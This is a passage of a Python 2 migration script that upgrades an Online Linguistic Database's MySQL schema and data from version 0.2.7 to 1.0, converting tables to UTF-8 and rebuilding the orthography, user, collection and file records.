`rules` text,
`rich_morphemes` tinyint(1) DEFAULT NULL,
`parent_directory` varchar(255) DEFAULT NULL,
`word_boundary_symbol` varchar(10) DEFAULT NULL,
`rare_delimiter` varchar(10) DEFAULT NULL,
`morpheme_delimiters` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `lexicon_corpus_id` (`lexicon_corpus_id`),
KEY `rules_corpus_id` (`rules_corpus_id`),
KEY `enterer_id` (`enterer_id`),
KEY `modifier_id` (`modifier_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
CREATE TABLE `morphologybackup` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`morphology_id` int(11) DEFAULT NULL,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`description` text,
`script_type` varchar(5),
`lexicon_corpus` text,
`rules_corpus` text,
`enterer` text,
`modifier` text,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`compile_succeeded` tinyint(1) DEFAULT NULL,
`compile_message` varchar(255) DEFAULT NULL,
`compile_attempt` varchar(36) DEFAULT NULL,
`generate_attempt` varchar(36) DEFAULT NULL,
`extract_morphemes_from_rules_corpus` tinyint(1) DEFAULT NULL,
`rules` text,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
ALTER TABLE page
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
ADD COLUMN html TEXT,
CHANGE markup markup_language VARCHAR(100) DEFAULT NULL,
MODIFY content TEXT;
UPDATE page SET markup_language='restructuredText';
ALTER TABLE phonology
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
MODIFY description TEXT,
MODIFY script TEXT,
ADD COLUMN compile_succeeded tinyint(1) DEFAULT NULL,
ADD COLUMN compile_message VARCHAR(255) DEFAULT NULL,
ADD COLUMN compile_attempt VARCHAR(36) DEFAULT NULL,
ADD COLUMN parent_directory varchar(255) DEFAULT NULL,
ADD COLUMN word_boundary_symbol varchar(10) DEFAULT NULL
ADD FOREIGN KEY (modifier_id) REFERENCES user(id),
ADD FOREIGN KEY (enterer_id) REFERENCES user(id);
CREATE TABLE `phonologybackup` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`phonology_id` int(11) DEFAULT NULL,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`description` text,
`script` text,
`enterer` text,
`modifier` text,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`compile_succeeded` tinyint(1) DEFAULT NULL,
`compile_message` varchar(255) DEFAULT NULL,
`compile_attempt` varchar(36) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
ALTER TABLE source
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
ADD COLUMN `crossref_source_id` int(11) DEFAULT NULL,
ADD COLUMN `type` varchar(20) DEFAULT NULL,
ADD COLUMN `key` varchar(1000) DEFAULT NULL,
ADD COLUMN `address` varchar(1000) DEFAULT NULL,
ADD COLUMN `annote` text,
ADD COLUMN `author` varchar(255) DEFAULT NULL,
ADD COLUMN `booktitle` varchar(255) DEFAULT NULL,
ADD COLUMN `chapter` varchar(255) DEFAULT NULL,
ADD COLUMN `crossref` varchar(1000) DEFAULT NULL,
ADD COLUMN `edition` varchar(255) DEFAULT NULL,
ADD COLUMN `editor` varchar(255) DEFAULT NULL,
ADD COLUMN `howpublished` varchar(255) DEFAULT NULL,
ADD COLUMN `institution` varchar(255) DEFAULT NULL,
ADD COLUMN `journal` varchar(255) DEFAULT NULL,
ADD COLUMN `key_field` varchar(255) DEFAULT NULL,
ADD COLUMN `month` varchar(100) DEFAULT NULL,
ADD COLUMN `note` varchar(1000) DEFAULT NULL,
ADD COLUMN `number` varchar(100) DEFAULT NULL,
ADD COLUMN `organization` varchar(255) DEFAULT NULL,
ADD COLUMN `pages` varchar(100) DEFAULT NULL,
ADD COLUMN `publisher` varchar(255) DEFAULT NULL,
ADD COLUMN `school` varchar(255) DEFAULT NULL,
ADD COLUMN `series` varchar(255) DEFAULT NULL,
ADD COLUMN `type_field` varchar(255) DEFAULT NULL,
ADD COLUMN `url` varchar(1000) DEFAULT NULL,
ADD COLUMN `volume` varchar(100) DEFAULT NULL,
ADD COLUMN `affiliation` varchar(255) DEFAULT NULL,
ADD COLUMN `abstract` varchar(1000) DEFAULT NULL,
ADD COLUMN `contents` varchar(255) DEFAULT NULL,
ADD COLUMN `copyright` varchar(255) DEFAULT NULL,
ADD COLUMN `ISBN` varchar(20) DEFAULT NULL,
ADD COLUMN `ISSN` varchar(20) DEFAULT NULL,
ADD COLUMN `keywords` varchar(255) DEFAULT NULL,
ADD COLUMN `language` varchar(255) DEFAULT NULL,
ADD COLUMN `location` varchar(255) DEFAULT NULL,
ADD COLUMN `LCCN` varchar(20) DEFAULT NULL,
ADD COLUMN `mrnumber` varchar(25) DEFAULT NULL,
ADD COLUMN `price` varchar(100) DEFAULT NULL,
ADD COLUMN `size` varchar(255) DEFAULT NULL,
ADD KEY (crossref_source_id);
ALTER TABLE speaker
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE firstName first_name VARCHAR(255) DEFAULT NULL,
CHANGE lastName last_name VARCHAR(255) DEFAULT NULL,
ADD COLUMN markup_language VARCHAR(100) DEFAULT NULL,
CHANGE speakerPageContent page_content TEXT,
ADD COLUMN html TEXT;
UPDATE speaker SET markup_language='restructuredText';
ALTER TABLE syntacticcategory
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
ADD COLUMN `type` VARCHAR(60) DEFAULT NULL,
MODIFY description TEXT;
ALTER TABLE `user`
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE firstName first_name VARCHAR(255) DEFAULT NULL,
CHANGE lastName last_name VARCHAR(255) DEFAULT NULL,
ADD COLUMN salt VARCHAR(255) DEFAULT NULL,
MODIFY role VARCHAR(100) DEFAULT NULL,
ADD COLUMN markup_language VARCHAR(100) DEFAULT NULL,
CHANGE personalPageContent page_content TEXT,
ADD COLUMN html TEXT,
ADD COLUMN input_orthography_id INT(11) DEFAULT NULL,
ADD COLUMN output_orthography_id INT(11) DEFAULT NULL,
ADD KEY (input_orthography_id),
ADD KEY (output_orthography_id),
DROP COLUMN collectionViewType;
UPDATE user SET markup_language='restructuredText';
ALTER TABLE userform
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
'''.strip()
def write_update_executable(mysql_update_script_name, here):
"""Write the contents of update_SQL to an executable and return the path to it."""
mysql_update_script = os.path.join(here, mysql_update_script_name)
if not os.path.exists(mysql_update_script):
with open(mysql_update_script, 'w') as f:
f.write(update_SQL)
os.chmod(mysql_update_script, 0744)
return mysql_update_script
# cleanup_SQL performs the final modifications on the database, dropping
# the columns that were retained in update_SQL.
cleanup_SQL = '''
ALTER TABLE applicationsettings
DROP COLUMN objectLanguageOrthography1Name,
DROP COLUMN objectLanguageOrthography1,
DROP COLUMN OLO1Lowercase,
DROP COLUMN OLO1InitialGlottalStops,
DROP COLUMN objectLanguageOrthography2Name,
DROP COLUMN objectLanguageOrthography2,
DROP COLUMN OLO2Lowercase,
DROP COLUMN OLO2InitialGlottalStops,
DROP COLUMN objectLanguageOrthography3Name,
DROP COLUMN objectLanguageOrthography3,
DROP COLUMN OLO3Lowercase,
DROP COLUMN OLO3InitialGlottalStops,
DROP COLUMN objectLanguageOrthography4Name,
DROP COLUMN objectLanguageOrthography4,
DROP COLUMN OLO4Lowercase,
DROP COLUMN OLO4InitialGlottalStops,
DROP COLUMN objectLanguageOrthography5Name,
DROP COLUMN objectLanguageOrthography5,
DROP COLUMN OLO5Lowercase,
DROP COLUMN OLO5InitialGlottalStops,
DROP COLUMN storageOrthography,
DROP COLUMN defaultInputOrthography,
DROP COLUMN defaultOutputOrthography,
DROP COLUMN unrestrictedUsers;
ALTER TABLE collectionbackup
DROP COLUMN backuper;
ALTER TABLE file
MODIFY url VARCHAR(255) DEFAULT NULL;
ALTER TABLE formbackup
DROP COLUMN backuper;
ALTER TABLE source
DROP COLUMN authorFirstName,
DROP COLUMN authorLastName,
DROP COLUMN fullReference;
ALTER TABLE user
DROP COLUMN inputOrthography,
DROP COLUMN outputOrthography;
'''.strip()
def row2dict(row):
"""Turn an SQLA row proxy object into a dict; clone any 'id' keys to 'id_' ones."""
row = dict([(k, normalize(v)) for k, v in dict(row).items()])
try:
row['id_'] = row['id']
except Exception:
pass
return row
def normalize(utf8_str):
"""Return an UTF-8 encoded string decompositionally normalized using NFD."""
try:
result = unicodedata.normalize('NFD', unicode(utf8_str, 'utf8')).encode('utf8')
except Exception:
result = utf8_str
return result
def print_(string):
"""Print to stdout immediately."""
sys.stdout.write(string)
sys.stdout.flush()
def get_db_to_text_script(mysql_db_name, mysql_username, mysql_password):
"""Return a string of shell/mysql commands that will write a subset of the db to stdout."""
script = [
"#!/bin/sh",
"mysql -u %s -p%s -e 'select transcription, phoneticTranscription, \
narrowPhoneticTranscription, morphemeBreak, morphemeGloss from %s.form;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s -e 'select contents from %s.collection;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s -e 'select firstName, lastName from %s.user;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s -e 'select name from %s.file;'" % (mysql_username, mysql_password, mysql_db_name),
]
return '\n'.join(script)
def write_db_to_text_file(pre_data_dump_name, here, mysql_updater, db_to_text_script):
"""Write a subset of the data in the db to a text file; output will be used post-processing
to ensure data integrity.
"""
print_('Writing a subset of the data in %s to a text file ... ' % mysql_db_name)
with open(mysql_updater, 'w') as f:
f.write(db_to_text_script)
pre_data_dump_path = os.path.join(here, pre_data_dump_name)
with open(pre_data_dump_path, 'w') as f:
subprocess.call([mysql_updater], shell=False, stdout=f, stderr=f)
print 'done.'
return pre_data_dump_path
def write_cleanup_executable(mysql_cleanup_script_name, here):
"""Write the contents of cleanup_SQL to an executable and return the path to it."""
mysql_cleanup_script = os.path.join(here, mysql_cleanup_script_name)
if not os.path.exists(mysql_cleanup_script ):
with open(mysql_cleanup_script , 'w') as f:
f.write(cleanup_SQL)
os.chmod(mysql_cleanup_script , 0744)
return mysql_cleanup_script
def write_charset_executable(mysql_charset_script_name, here):
"""Write to disk as an executable the file that will be used to issue the MySQL
statements that change the character set to UTF-8 -- return the absolute path.
"""
mysql_charset_script = os.path.join(here, mysql_charset_script_name)
if not os.path.exists(mysql_charset_script):
with open(mysql_charset_script, 'w') as f:
pass
os.chmod(mysql_charset_script, 0744)
return mysql_charset_script
def write_updater_executable(mysql_updater_name, here):
"""Write to disk the shell script that will be used to load the various MySQL scripts.
Return the absolute path.
"""
mysql_updater = os.path.join(here, mysql_updater_name)
with open(mysql_updater, 'w') as f:
pass
os.chmod(mysql_updater, 0744)
return mysql_updater
def recreate_database(mysql_db_name, mysql_dump_file, mysql_username, mysql_password, mysql_updater):
"""Drop the database `mysql_db_name` and recreate it using the MySQL dump file.
"""
print_('Dropping database %s, recreating it and loading the data from the dump file %s ... ' % (mysql_db_name, mysql_dump_file))
script = [
"#!/bin/sh",
"mysql -u %s -p%s -e 'drop database %s;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s -e 'create database %s;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s %s < %s" % (mysql_username, mysql_password, mysql_db_name, mysql_dump_file),
]
with open(mysql_updater, 'w') as f:
f.write('\n'.join(script))
with open(os.devnull, 'w') as devnull:
subprocess.call([mysql_updater], shell=False, stdout=devnull, stderr=devnull)
print 'done.'
def get_non_utf8_tables_columns(mysql_db_name, mysql_username, mysql_password):
"""Return two lists: the names of tables and columns that do not use the UTF-8 character set."""
sqlalchemy_url = 'mysql://%s:%s@localhost:3306/information_schema' % (mysql_username, mysql_password)
info_schema_engine = create_engine(sqlalchemy_url)
tables_table = Table('TABLES', meta, autoload=True, autoload_with=info_schema_engine)
columns_table = Table('COLUMNS', meta, autoload=True, autoload_with=info_schema_engine)
select = tables_table.select().\
where(tables_table.c.TABLE_SCHEMA == bindparam('mysql_db_name')).\
where(tables_table.c.TABLE_COLLATION != 'utf8_general_ci')
non_utf8_tables = [row['TABLE_NAME'] for row in
info_schema_engine.execute(select, {'mysql_db_name': mysql_db_name}).fetchall()]
select = columns_table.select().\
where(columns_table.c.TABLE_SCHEMA == bindparam('mysql_db_name')).\
where(columns_table.c.COLLATION_NAME != 'utf8_general_ci')
non_utf8_columns = [row['COLUMN_NAME'] for row in
info_schema_engine.execute(select, {'mysql_db_name': mysql_db_name}).fetchall()]
return non_utf8_tables, non_utf8_columns
def get_database_info(mysql_db_name, mysql_username, mysql_password):
"""Return information about the character sets and collations used in the database.
"""
columns = {}
sqlalchemy_url = 'mysql://%s:%s@localhost:3306/information_schema' % (mysql_username, mysql_password)
info_schema_engine = create_engine(sqlalchemy_url)
columns_table = Table('COLUMNS', meta, autoload=True, autoload_with=info_schema_engine)
schemata_table = Table('SCHEMATA', meta, autoload=True, autoload_with=info_schema_engine)
db_charset = info_schema_engine.execute(schemata_table.select().where(schemata_table.c.SCHEMA_NAME==mysql_db_name)).\
fetchall()[0]['DEFAULT_CHARACTER_SET_NAME']
tables_table = Table('TABLES', meta, autoload=True, autoload_with=info_schema_engine)
table_collations = dict([(r['TABLE_NAME'], r['TABLE_COLLATION']) for r in
info_schema_engine.execute(tables_table.select().where(tables_table.c.TABLE_SCHEMA==mysql_db_name))])
select = columns_table.select().\
where(columns_table.c.TABLE_SCHEMA == bindparam('mysql_db_name')).\
where(columns_table.c.COLLATION_NAME != None)
for row in info_schema_engine.execute(select, {'mysql_db_name': mysql_db_name}):
columns.setdefault(row['table_name'], {})[row['COLUMN_NAME']] = (row['COLLATION_NAME'], row['COLUMN_TYPE'], row['COLUMN_KEY'])
#tables.setdefault(row['table_name'], []).append({row['COLUMN_NAME']: (row['COLLATION_NAME'], row['COLUMN_TYPE'], row['COLUMN_KEY'])})
return db_charset, table_collations, columns
def get_binary_column_type(column_type):
"""Return an appropriate binary column type for the input one, cf. https://codex.wordpress.org/Converting_Database_Character_Sets."""
try:
return {
'char': 'binary',
'text': 'blob',
'tinytext': 'tinyblob',
'mediumtext': 'mediumblob',
'longtext': 'longblob'
}[column_type.lower()]
except KeyError:
if column_type.lower().startswith('varchar('):
return 'varbinary(%s)' % column_type[8:-1]
return 'blob'
def write_charset_executable_content(mysql_charset_script, mysql_db_name, mysql_username, mysql_password,
db_charset, table_collations, columns):
"""Write a series of MySQL commands to the file at the path in mysql_charset_script; these commands will alter
the tables and columns (and the db) so that they use the UTF-8 character set.
"""
with open(mysql_charset_script, 'w') as f:
if db_charset != 'utf8':
f.write('ALTER DATABASE %s CHARACTER SET utf8;\n\n' % mysql_db_name)
#for table_name, columns in columns_with_collations.items():
for table_name, table_collation in table_collations.items():
if not table_collation == 'utf8_general_ci':
f.write('ALTER TABLE %s CHARACTER SET utf8;\n\n' % table_name)
non_utf8_columns = dict([(c_name, (c_type, c_key)) for c_name, (c_coll, c_type, c_key) in
columns.get(table_name, {}).items() if c_coll != 'utf8_general_ci'])
if non_utf8_columns:
indices = [(c_name, c_key) for c_name, (c_type, c_key) in non_utf8_columns.items() if c_key]
f.write('ALTER TABLE %s\n' % table_name)
if indices:
for c_name, c_key in indices:
if c_key == 'PRI':
f.write(' DROP PRIMARY KEY,\n')
else:
f.write(' DROP INDEX %s,\n' % c_name)
f.write(' %s;\n\n' % ',\n '.join(
['CHANGE `%s` `%s` %s' % (c_name, c_name, get_binary_column_type(c_type))
for c_name, (c_type, c_key) in non_utf8_columns.items()]))
for table_name, columns_dict in columns.items():
non_utf8_columns = dict([(c_name, (c_type, c_key)) for c_name, (c_coll, c_type, c_key) in
columns_dict.items() if c_coll != 'utf8_general_ci'])
indices = [(c_name, c_key) for c_name, (c_type, c_key) in non_utf8_columns.items() if c_key]
if non_utf8_columns:
f.write('ALTER TABLE %s\n' % table_name)
f.write(' %s' % ',\n '.join(
['CHANGE `%s` `%s` %s CHARACTER SET utf8' % (c_name, c_name, c_type) for c_name, (c_type, c_key) in non_utf8_columns.items()]))
if indices:
f.write(',\n')
for index, (c_name, c_key) in enumerate(indices):
if c_key == 'PRI':
f.write(' ADD PRIMARY KEY (`%s`)' % c_name)
else:
f.write(' ADD UNIQUE (`%s`)' % c_name)
if index == len(indices) - 1:
f.write(';\n\n')
else:
f.write(',\n')
else:
f.write(';\n\n')
def change_db_charset_to_utf8(mysql_db_name, mysql_charset_script, mysql_username, mysql_password,
mysql_updater, db_charset, table_collations, columns):
"""Run the executable at `mysql_charset_script` in order to change the character set of the db to UTF-8.
Note that this was not working correctly. We need to make sure that MySQL is using UTF-8 everywhere, see
this web page for how to do that: http://cameronyule.com/2008/07/configuring-mysql-to-use-utf-8/.
"""
print_('Changing the character set of the database to UTF-8 ... ')
write_charset_executable_content(mysql_charset_script, mysql_db_name, mysql_username, mysql_password,
db_charset, table_collations, columns)
script = [
"#!/bin/sh",
"mysql -u %s -p%s %s < %s" % (mysql_username, mysql_password, mysql_db_name, mysql_charset_script),
]
with open(mysql_updater, 'w') as f:
f.write('\n'.join(script))
with open(os.devnull, 'w') as devnull:
subprocess.call([mysql_updater], shell=False, stdout=devnull, stderr=devnull)
print 'done.'
def perform_preliminary_update(mysql_db_name, mysql_update_script, mysql_username, mysql_password, mysql_updater):
"""Perform the preliminary update of the db by calling the executable at ``mysql_update_script``."""
print_('Running the MySQL update script ... ')
mysql_script_content = '#!/bin/sh\nmysql -u %s -p%s %s < %s' % (mysql_username, mysql_password, mysql_db_name, mysql_update_script)
with open(mysql_updater, 'w') as f:
f.write(mysql_script_content)
with open(os.devnull, 'w') as devnull:
subprocess.call([mysql_updater], shell=False, stdout=devnull, stderr=devnull)
print 'done.'
def extract_orthographies_from_application_settings(applicationsettings):
orthographies = []
for i in range(1,6):
if applicationsettings['objectLanguageOrthography%d' % i]:
orthographies.append({
'orthography': applicationsettings['objectLanguageOrthography%d' % i],
'name': applicationsettings['objectLanguageOrthography%dName' % i],
'lowercase': applicationsettings['OLO%dLowercase' % i],
'initial_glottal_stops': applicationsettings['OLO%dInitialGlottalStops' % i],
'datetime_modified': applicationsettings['datetime_modified'],
})
return orthographies
def fix_orthography_table(engine, orthography_table, application_settings_collation):
"""Create some orthography rows using all of the unique orthographies implicit in the applicationsettings table."""
print_('Fixing the orthography table ... ')
if application_settings_collation.startswith('latin'):
engine.execute('set names utf8;')
else:
engine.execute('set names latin1;')
applicationsettings = engine.execute(applicationsettings_table.select()).fetchall()
orthographies_dict = {}
for applicationsetting in applicationsettings:
orthographies = extract_orthographies_from_application_settings(applicationsetting)
for orthography in orthographies:
orthographies_dict.setdefault(
(normalize(orthography['name']), normalize(orthography['orthography']),
orthography['lowercase'], orthography['initial_glottal_stops']), []).\
append(orthography['datetime_modified'])
buffer1 = []
for (name, orthography, lowercase, initial_glottal_stops), dts in orthographies_dict.items():
max_dt_modified = max(dts)
buffer1.append({'name': name, 'orthography': orthography, 'lowercase': lowercase,
'initial_glottal_stops': initial_glottal_stops, 'datetime_modified': max_dt_modified})
engine.execute('set names utf8;')
if buffer1:
insert = orthography_table.insert().values(**dict([(k, bindparam(k)) for k in buffer1[0]]))
engine.execute(insert, buffer1)
print 'done.'
def get_orthographies_by_name(engine):
"""Return a dict form orthography names to the largest id corresponding to an orthography with that name."""
orthographies = {}
engine.execute('set names utf8;')
query = 'SELECT id, name FROM orthography;'
result = engine.execute(query).fetchall()
for id, name in result:
orthographies.setdefault(name, []).append(id)
for name, ids in orthographies.items():
orthographies[name] = max(ids)
return orthographies
def collation2charset(collation):
return {'utf8_general_ci': 'utf8'}.get(collation, 'latin1')
def fix_applicationsettings_table(engine, applicationsettings_table, user_table, now_string, table_collations):
"""Fix the applicationsettings table: create the orthography and unrestricted_users relations."""
print_('Fixing the applicationsettings table ... ')
msgs = []
orthographies = get_orthographies_by_name(engine)
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
users = engine.execute(user_table.select()).fetchall()
user_ids = [u['id'] for u in users]
buffer1 = []
for row in engine.execute(applicationsettings_table.select()):
# Convert the orthography references by name to foreign key id references
values = row2dict(row)
if row['storageOrthography']:
orthography_id = getOrthographyReferenced(values['storageOrthography'], values, orthographies)
if orthography_id:
values['storage_orthography_id'] = orthography_id
if row['defaultInputOrthography']:
orthography_id = getOrthographyReferenced(values['defaultInputOrthography'], values, orthographies)
if orthography_id:
values['input_orthography_id'] = orthography_id
if row['defaultOutputOrthography']:
orthography_id = getOrthographyReferenced(values['defaultOutputOrthography'], values, orthographies)
if orthography_id:
values['output_orthography_id'] = orthography_id
buffer1.append(values)
try:
unrestricted_user_ids = json.loads(values['unrestrictedUsers'])
for user_id in unrestricted_user_ids:
if user_id in user_ids:
engine.execute(
"INSERT INTO applicationsettingsuser (applicationsettings_id, user_id, datetime_modified) VALUES (%d, %d, '%s');" % (
values['id'], user_id, now_string))
else:
msgs.append('WARNING: user %d was listed as unrestricted but this user does not exist.\n' % user_id)
except Exception:
pass
if buffer1:
engine.execute('set names utf8;')
update = applicationsettings_table.update().where(applicationsettings_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0].keys() if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_user_table(engine, user_table):
"""Generate new values for password, salt, html, input_orthography_id and output_orthography_id."""
print_('Fixing the user table ... ')
msgs = []
orthographies = get_orthographies_by_name(engine)
try:
engine.execute('set names utf8;')
current_application_settings = engine.execute('SELECT * FROM applicationsettings ORDER BY id DESC LIMIT 1;').fetchall()[0]
except Exception:
current_application_settings = None
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
buffer1 = []
for row in engine.execute(user_table.select()):
values = row2dict(row)
last_name = values['last_name']
first_name = values['first_name']
values['html'] = rst2html(values['page_content'])
values['salt'] = generateSalt()
new_password = generatePassword()
values['password'] = encryptPassword(new_password, values['salt'])
msgs.append('%s %s (%s) now has the password %s' % (first_name, last_name, values['email'], new_password))
if values['role'] not in ('administrator', 'contributor', 'viewer'):
msgs.append('User %d (%s %s) had an invalid role (%s); now changed to viewer' % (values['id'], first_name, last_name, values['role']))
values['role'] = 'viewer'
values['input_orthography_id'] = values['output_orthography_id'] = None
if current_application_settings:
if values['inputOrthography']:
orthography_name = current_application_settings['objectLanguageOrthography%sName' % values['inputOrthography'].split()[-1]]
values['input_orthography_id'] = orthographies.get(orthography_name, None)
if values['outputOrthography']:
orthography_name = current_application_settings['objectLanguageOrthography%sName' % values['outputOrthography'].split()[-1]]
values['output_orthography_id'] = orthographies.get(orthography_name, None)
buffer1.append(values)
engine.execute('set names utf8;')
if buffer1:
update = user_table.update().where(user_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_collection_table(engine, collection_table, collectionbackup_table, user_table):
"""Add UUID, html, contents_unpacked and modifier_id values to the collections. Also,
add UUID values to the backups of each collection. Return a list of collection ids corresponding
to those that reference other collections.
.. note::
There is a somewhat nasty complication that arises because of a change
in how backupers/modifiers are recorded with backups. In the OLD 0.2.7, every
time a backup occurs, the backuper value of the backup is set to the user who
made the backup and this information is not stored in the original. In the OLD 1.0,
creates, updates and deletes all set the modifier value to the user who performed
the action and then this info is copied to the modifier value of the backup. Thus we
must perform the following transformations:
for collection in collections:
if collection has a backuper
then it has been updated, so we should
set its modifier to the user referenced in the backuper attribute of its most recent backuper
else
then it was created but never updated or deleted, so we should
set its modifier to its enterer
for collectionbackup in collectionbackups:
if there are older backups of the same collection
then set the modifier of the present collectionbackup to the backuper value of the most recent such sister backup
else
this is the first backup and its modifier should be its enterer
"""
print_('Fixing the collection table ... ')
collectionReferencePattern = re.compile('[cC]ollection[\[\(](\d+)[\]\)]')
msgs = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
users = engine.execute(user_table.select()).fetchall()
collectionbackups = engine.execute(collectionbackup_table.select()).fetchall()
buffer1 = []
buffer2 = []
for row in engine.execute(collection_table.select()):
values = row2dict(row)
values['UUID'] = str(uuid4())
values['html'] = rst2html(values['contents'])
values['contents_unpacked'] = values['contents']
backups = sorted([cb for cb in collectionbackups if cb['collection_id'] == values['id']],
key=lambda cb: cb['datetime_modified'])
if backups:
try:
most_recent_backuper = json.loads(backups[-1]['backuper'])['id']
if [u for u in users if u['id'] == most_recent_backuper]:
values['modifier_id'] = most_recent_backuper
else:
values['modifier_id'] = values['enterer_id']
msgs.append('WARNING: there is no user with id %d to be the most recent backuper for for collection %d' % (
most_recent_backuper, values['id']))
except Exception:
msgs.append('''WARNING: there are %d backups for collection %d; however,
it was not possible to extract a backuper from the most recent one (backuper value: %s)'''.replace('\n', ' ') % (
len(backups), values['id'], backups[-1]['backuper']))
values['modifier_id'] = values['enterer_id']
else:
values['modifier_id'] = values['enterer_id']
if collectionReferencePattern.search(row['contents']):
msgs.append('''WARNING: collection %d references other collections; please update this collection via the
OLD interface in order to generate appropriate html and contents_unpacked values.''' % values['id'])
buffer1.append(values)
for cb in backups:
buffer2.append({'cb_id': cb['id'], 'UUID': values['UUID']})
engine.execute('set names utf8;')
if buffer1:
update = collection_table.update().where(collection_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
if buffer2:
update = collectionbackup_table.update().where(collectionbackup_table.c.id==bindparam('cb_id')).\
values(UUID=bindparam('UUID'))
engine.execute(update, buffer2)
print 'done.'
return msgs
def fix_collectionbackup_table(engine, collectionbackup_table):
"""Add html, modifier and (potentially) UUID values to the collections backups."""
print_('Fixing the collectionbackup table ... ')
uuidless = {} # maps collection ids to UUIDs
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
collectionbackups = engine.execute(collectionbackup_table.select()).fetchall()
buffer1 = []
for row in collectionbackups:
values = row2dict(row)
values['html'] = rst2html(values['contents'])
backups = sorted([cb for cb in collectionbackups if cb['collection_id'] == values['collection_id']],
key=lambda cb: cb['datetime_modified'])
if backups:
most_recent_backuper = backups[-1]['backuper']
values['modifier'] = most_recent_backuper
else:
values['modifier'] = row['enterer']
# Any cbs without UUID values must be from deleted collections
if values['UUID'] is None:
uuid = uuidless.get(values['collection_id'], uuid4())
uuidless[values['collection_id']] = uuid
values['UUID'] = uuid
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = collectionbackup_table.update().where(collectionbackup_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_elicitationmethod_table(engine, elicitationmethod_table):
print_('Fixing the elicitationmethod table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(elicitationmethod_table.select()):
values = row2dict(row)
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = elicitationmethod_table.update().where(elicitationmethod_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_file_table(engine, file_table):
"""Fix the file table: if the file has a url value, append it to the description
value and delete it from the url value; otherwise, set the filename value to the name value.
"""
print_('Fixing the file table ... ')
msgs = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
files = engine.execute(file_table.select()).fetchall()
buffer1 = []
for row in files:
values = row2dict(row)
if row['url']:
values['url'] = ''
values['description'] = '%s %s' % (row['description'], row['url'])
messages.append('''WARNING: the url/embeddedFileMarkup value of file %d has been appended
to its description value. Please alter this file by hand so that it has
an appropriate url value'''.replace('\n', ' ') % row['id'])
buffer1.append(values)
else:
values['filename'] = row['name']
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = file_table.update().where(file_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_form_table(engine, form_table, formbackup_table, user_table, default_morphemes):
"""Give UUID, modifier_id values to the form table. Also give UUID values to
all form backups that are backups of existing forms.
:param bool default_morphemes: if True, then forms that have no morpheme_break and no morpheme_gloss
and whose transcription contains no space will receive a default morpheme_break value (the value
of the transcription attribute) and a default morpheme_gloss value (the value of the first translation
transcription with spaces replaced by periods).
.. note::
There is a somewhat nasty complication that arises because of a change
in how backupers/modifiers are recorded with backups. In the OLD 0.2.7, every
time a backup occurs, the backuper value of the backup is set to the user who
made the backup and this information is not stored in the original. In the OLD 1.0,
creates, updates and deletes all set the modifier value to the user who performed
the action and then this info is copied to the modifier value of the backup. Thus we
must perform the following transformations:
for form in forms:
if forms has a backuper
then it has been updated, so we should
set its modifier to the user referenced in the backuper attribute of its most recent backuper
else
then it was created but never updated or deleted, so we should
set its modifier to its enterer
for formbackup in formbackups:
if there are older backups of the same form
then set the modifier of the present formbackup to the backuper value of the most recent such sister backup
else
this is the first backup and its modifier should be its enterer
"""
print_('Fixing the form table ... ')
msgs = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
users = engine.execute(user_table.select()).fetchall()
